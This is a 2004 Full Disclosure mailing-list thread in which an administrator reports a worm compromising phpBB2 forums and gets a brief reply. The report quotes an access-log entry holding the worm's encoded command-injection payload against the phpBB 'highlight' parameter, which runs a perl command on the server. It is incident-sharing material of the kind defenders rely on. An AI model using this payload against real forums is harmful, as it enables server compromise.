Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Worm hitting PHPbb2 Forums

From: Christopher Adickes <christopher_adickes () SHI com>
Date: Tue, 21 Dec 2004 12:46:30 -0500
In addition to your post here is some more info.  

http://isc.sans.org/


-----Original Message-----
From: L. Walker [mailto:lwalker () magi net au] 
Sent: Tuesday, December 21, 2004 4:23 AM
To: incidents () securityfocus com
Cc: full-disclosure () lists netsys com
Subject: Worm hitting PHPbb2 Forums
Importance: High

Just spotted two clients hit by this.  One client didnt update his
software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. 
Chkrootkit says its Adore, however could be something else.  Datacenter
wasn't very smart and has since wiped the server, so no binaries or other
evidence.

Generation 12 only wiped out PHP files, replacing them with its own
message on other client's PHPbb2 forum.  Access logs show:

66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%
2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%
252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%2
52echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252
echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252ec
hr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252ec
hr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252ech
r(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252ec
hr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr
(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr
(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34
))%252e%2527
HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2
aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)
%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%2
52echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%2
52echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252e
chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252e
chr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252ech
r(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr
(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(
78)%252echr(41)%252echr(34))%252e%2527"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant
--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: